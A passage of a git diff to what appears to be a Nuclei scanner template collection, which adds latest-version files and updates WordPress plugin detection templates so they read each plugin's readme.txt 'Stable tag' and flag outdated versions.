regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wordpress-importer.txt b/technologies/wordpress/wordpress-wordpress-importer.txt new file mode 100644 index 0000000000..ce609caf85 --- /dev/null +++ b/technologies/wordpress/wordpress-wordpress-importer.txt @@ -0,0 +1 @@ +0.8 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wordpress-importer.yaml b/technologies/wordpress/wordpress-wordpress-importer.yaml index 6e34ca4f88..8e5495f175 100644 --- a/technologies/wordpress/wordpress-wordpress-importer.yaml +++ b/technologies/wordpress/wordpress-wordpress-importer.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wordpress-importer/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wordpress-importer.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wordpress-seo.txt b/technologies/wordpress/wordpress-wordpress-seo.txt new file mode 100644 index 0000000000..d6237c2631 --- /dev/null +++ b/technologies/wordpress/wordpress-wordpress-seo.txt @@ -0,0 +1 @@ +19.11 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wordpress-seo.yaml b/technologies/wordpress/wordpress-wordpress-seo.yaml index 93855c53ca..3a4c46d40c 100644 --- a/technologies/wordpress/wordpress-wordpress-seo.yaml +++ b/technologies/wordpress/wordpress-wordpress-seo.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wordpress-seo/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wordpress-seo.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-worker.txt b/technologies/wordpress/wordpress-worker.txt new file mode 100644 index 0000000000..f577dfda01 --- /dev/null +++ b/technologies/wordpress/wordpress-worker.txt @@ -0,0 +1 @@ +trunk \ No newline at end of file diff --git a/technologies/wordpress/wordpress-worker.yaml b/technologies/wordpress/wordpress-worker.yaml index a9f87490cb..aa330744ce 100644 --- a/technologies/wordpress/wordpress-worker.yaml +++ b/technologies/wordpress/wordpress-worker.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/worker/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-worker.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-fastest-cache.txt b/technologies/wordpress/wordpress-wp-fastest-cache.txt new file mode 100644 index 0000000000..337a6a8f18 --- /dev/null +++ b/technologies/wordpress/wordpress-wp-fastest-cache.txt @@ -0,0 +1 @@ +1.0.8 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-fastest-cache.yaml b/technologies/wordpress/wordpress-wp-fastest-cache.yaml index d341a60c47..bae8881b3b 100644 --- a/technologies/wordpress/wordpress-wp-fastest-cache.yaml +++ b/technologies/wordpress/wordpress-wp-fastest-cache.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wp-fastest-cache.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-file-manager.txt b/technologies/wordpress/wordpress-wp-file-manager.txt new file mode 100644 index 0000000000..c32f54ca04 --- /dev/null +++ b/technologies/wordpress/wordpress-wp-file-manager.txt @@ -0,0 +1 @@ +7.1.6 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-file-manager.yaml b/technologies/wordpress/wordpress-wp-file-manager.yaml index f3e8b0f584..97443a8b4b 100644 --- a/technologies/wordpress/wordpress-wp-file-manager.yaml +++ b/technologies/wordpress/wordpress-wp-file-manager.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-file-manager/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wp-file-manager.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-google-maps.txt b/technologies/wordpress/wordpress-wp-google-maps.txt new file mode 100644 index 0000000000..5fb79fe47c --- /dev/null +++ b/technologies/wordpress/wordpress-wp-google-maps.txt @@ -0,0 +1 @@ +9.0.13 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-google-maps.yaml b/technologies/wordpress/wordpress-wp-google-maps.yaml index 76d1f23ecd..366797b908 100644 --- a/technologies/wordpress/wordpress-wp-google-maps.yaml +++ b/technologies/wordpress/wordpress-wp-google-maps.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-google-maps/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wp-google-maps.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-mail-smtp.txt b/technologies/wordpress/wordpress-wp-mail-smtp.txt new file mode 100644 index 0000000000..d1428a7e96 --- /dev/null +++ b/technologies/wordpress/wordpress-wp-mail-smtp.txt @@ -0,0 +1 @@ +3.6.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-mail-smtp.yaml b/technologies/wordpress/wordpress-wp-mail-smtp.yaml index 3cd983a0c2..d50965dd70 100644 --- a/technologies/wordpress/wordpress-wp-mail-smtp.yaml +++ b/technologies/wordpress/wordpress-wp-mail-smtp.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wp-mail-smtp.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-maintenance-mode.txt b/technologies/wordpress/wordpress-wp-maintenance-mode.txt new file mode 100644 index 0000000000..b8d12d7371 --- /dev/null +++ b/technologies/wordpress/wordpress-wp-maintenance-mode.txt @@ -0,0 +1 @@ +2.6.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-maintenance-mode.yaml b/technologies/wordpress/wordpress-wp-maintenance-mode.yaml index 2f079b6b4d..facb415b8b 100644 --- a/technologies/wordpress/wordpress-wp-maintenance-mode.yaml +++ b/technologies/wordpress/wordpress-wp-maintenance-mode.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-maintenance-mode/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wp-maintenance-mode.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-migrate-db.txt b/technologies/wordpress/wordpress-wp-migrate-db.txt new file mode 100644 index 0000000000..fad066f801 --- /dev/null +++ b/technologies/wordpress/wordpress-wp-migrate-db.txt @@ -0,0 +1 @@ +2.5.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-migrate-db.yaml b/technologies/wordpress/wordpress-wp-migrate-db.yaml index 550a6ab260..dbd4811fe2 100644 --- a/technologies/wordpress/wordpress-wp-migrate-db.yaml +++ b/technologies/wordpress/wordpress-wp-migrate-db.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-migrate-db/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wp-migrate-db.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-multibyte-patch.txt b/technologies/wordpress/wordpress-wp-multibyte-patch.txt new file mode 100644 index 0000000000..0a35d8c853 --- /dev/null +++ b/technologies/wordpress/wordpress-wp-multibyte-patch.txt @@ -0,0 +1 @@ +2.9 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-multibyte-patch.yaml b/technologies/wordpress/wordpress-wp-multibyte-patch.yaml index 94dae30ea3..da742948dd 100644 --- a/technologies/wordpress/wordpress-wp-multibyte-patch.yaml +++ b/technologies/wordpress/wordpress-wp-multibyte-patch.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-multibyte-patch/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wp-multibyte-patch.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-optimize.txt b/technologies/wordpress/wordpress-wp-optimize.txt new file mode 100644 index 0000000000..df4bdc7e53 --- /dev/null +++ b/technologies/wordpress/wordpress-wp-optimize.txt @@ -0,0 +1 @@ +3.2.9 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-optimize.yaml b/technologies/wordpress/wordpress-wp-optimize.yaml index 7ee1d78fa4..3c25b10514 100644 --- a/technologies/wordpress/wordpress-wp-optimize.yaml +++ b/technologies/wordpress/wordpress-wp-optimize.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-optimize/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wp-optimize.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-pagenavi.txt b/technologies/wordpress/wordpress-wp-pagenavi.txt new file mode 100644 index 0000000000..5b8c174f14 --- /dev/null +++ b/technologies/wordpress/wordpress-wp-pagenavi.txt @@ -0,0 +1 @@ +2.94.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-pagenavi.yaml b/technologies/wordpress/wordpress-wp-pagenavi.yaml index d7b5e63974..d28f0159a1 100644 --- a/technologies/wordpress/wordpress-wp-pagenavi.yaml +++ b/technologies/wordpress/wordpress-wp-pagenavi.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-pagenavi/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wp-pagenavi.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-reset.txt b/technologies/wordpress/wordpress-wp-reset.txt new file mode 100644 index 0000000000..c3be2287dc --- /dev/null +++ b/technologies/wordpress/wordpress-wp-reset.txt @@ -0,0 +1 @@ +1.96 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-reset.yaml b/technologies/wordpress/wordpress-wp-reset.yaml index 841d2b1104..bbfd45b3b3 100644 --- a/technologies/wordpress/wordpress-wp-reset.yaml +++ b/technologies/wordpress/wordpress-wp-reset.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-reset/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wp-reset.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-sitemap-page.txt b/technologies/wordpress/wordpress-wp-sitemap-page.txt new file mode 100644 index 0000000000..6f2d3653d5 --- /dev/null +++ b/technologies/wordpress/wordpress-wp-sitemap-page.txt @@ -0,0 +1 @@ +1.9.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-sitemap-page.yaml b/technologies/wordpress/wordpress-wp-sitemap-page.yaml index 91db5b3eaa..d9b20aa1ef 100644 --- a/technologies/wordpress/wordpress-wp-sitemap-page.yaml +++ b/technologies/wordpress/wordpress-wp-sitemap-page.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-sitemap-page/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wp-sitemap-page.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-smushit.txt b/technologies/wordpress/wordpress-wp-smushit.txt new file mode 100644 index 0000000000..dd6a2206f4 --- /dev/null +++ b/technologies/wordpress/wordpress-wp-smushit.txt @@ -0,0 +1 @@ +3.12.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-smushit.yaml b/technologies/wordpress/wordpress-wp-smushit.yaml index a3718d845f..64f1a2cbec 100644 --- a/technologies/wordpress/wordpress-wp-smushit.yaml +++ b/technologies/wordpress/wordpress-wp-smushit.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-smushit/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wp-smushit.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-statistics.txt b/technologies/wordpress/wordpress-wp-statistics.txt new file mode 100644 index 0000000000..fccfd7572b --- /dev/null +++ b/technologies/wordpress/wordpress-wp-statistics.txt @@ -0,0 +1 @@ +13.2.8 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-statistics.yaml b/technologies/wordpress/wordpress-wp-statistics.yaml index eb205f5539..e65ec7d065 100644 --- a/technologies/wordpress/wordpress-wp-statistics.yaml +++ b/technologies/wordpress/wordpress-wp-statistics.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wp-statistics.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-super-cache.txt b/technologies/wordpress/wordpress-wp-super-cache.txt new file mode 100644 index 0000000000..ee672d89ab --- /dev/null +++ b/technologies/wordpress/wordpress-wp-super-cache.txt @@ -0,0 +1 @@ +1.9.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-super-cache.yaml b/technologies/wordpress/wordpress-wp-super-cache.yaml index e58e09cd4e..5513b4121b 100644 --- a/technologies/wordpress/wordpress-wp-super-cache.yaml +++ b/technologies/wordpress/wordpress-wp-super-cache.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-super-cache/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wp-super-cache.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-user-avatar.txt b/technologies/wordpress/wordpress-wp-user-avatar.txt new file mode 100644 index 0000000000..7e961f9e14 --- /dev/null +++ b/technologies/wordpress/wordpress-wp-user-avatar.txt @@ -0,0 +1 @@ +4.3.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-user-avatar.yaml b/technologies/wordpress/wordpress-wp-user-avatar.yaml index e6e657ed24..cb9b9248d6 100644 --- a/technologies/wordpress/wordpress-wp-user-avatar.yaml +++ b/technologies/wordpress/wordpress-wp-user-avatar.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-user-avatar/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wp-user-avatar.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wpcf7-recaptcha.txt b/technologies/wordpress/wordpress-wpcf7-recaptcha.txt new file mode 100644 index 0000000000..3c80e4f0f2 --- /dev/null +++ b/technologies/wordpress/wordpress-wpcf7-recaptcha.txt @@ -0,0 +1 @@ +1.4.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wpcf7-recaptcha.yaml b/technologies/wordpress/wordpress-wpcf7-recaptcha.yaml index 342424568f..8be6e4fab9 100644 --- a/technologies/wordpress/wordpress-wpcf7-recaptcha.yaml +++ b/technologies/wordpress/wordpress-wpcf7-recaptcha.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wpcf7-recaptcha/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wpcf7-recaptcha.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wpcf7-redirect.txt b/technologies/wordpress/wordpress-wpcf7-redirect.txt new file mode 100644 index 0000000000..9aa34646dc --- /dev/null +++ b/technologies/wordpress/wordpress-wpcf7-redirect.txt @@ -0,0 +1 @@ +2.7.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wpcf7-redirect.yaml b/technologies/wordpress/wordpress-wpcf7-redirect.yaml index d4c2667d25..4a9cef7306 100644 --- a/technologies/wordpress/wordpress-wpcf7-redirect.yaml +++ b/technologies/wordpress/wordpress-wpcf7-redirect.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wpcf7-redirect/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wpcf7-redirect.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wpforms-lite.txt b/technologies/wordpress/wordpress-wpforms-lite.txt new file mode 100644 index 0000000000..25a6ced8b2 --- /dev/null +++ b/technologies/wordpress/wordpress-wpforms-lite.txt @@ -0,0 +1 @@ +1.7.8 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wpforms-lite.yaml b/technologies/wordpress/wordpress-wpforms-lite.yaml index 162e1977a9..dc1e6bc501 100644 --- a/technologies/wordpress/wordpress-wpforms-lite.yaml +++ b/technologies/wordpress/wordpress-wpforms-lite.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wpforms-lite/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wpforms-lite.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wps-hide-login.txt b/technologies/wordpress/wordpress-wps-hide-login.txt new file mode 100644 index 0000000000..b4cac6fa40 --- /dev/null +++ b/technologies/wordpress/wordpress-wps-hide-login.txt @@ -0,0 +1 @@ +1.9.6 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wps-hide-login.yaml b/technologies/wordpress/wordpress-wps-hide-login.yaml index 5e5827595e..e433331f89 100644 --- a/technologies/wordpress/wordpress-wps-hide-login.yaml +++ b/technologies/wordpress/wordpress-wps-hide-login.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wps-hide-login/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wps-hide-login.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-yith-woocommerce-compare.txt b/technologies/wordpress/wordpress-yith-woocommerce-compare.txt new file mode 100644 index 0000000000..0352eb1709 --- /dev/null +++ b/technologies/wordpress/wordpress-yith-woocommerce-compare.txt @@ -0,0 +1 @@ +2.20.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-yith-woocommerce-compare.yaml b/technologies/wordpress/wordpress-yith-woocommerce-compare.yaml index bc98d8e7a7..8571468220 100644 --- a/technologies/wordpress/wordpress-yith-woocommerce-compare.yaml +++ b/technologies/wordpress/wordpress-yith-woocommerce-compare.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/yith-woocommerce-compare/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-yith-woocommerce-compare.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: 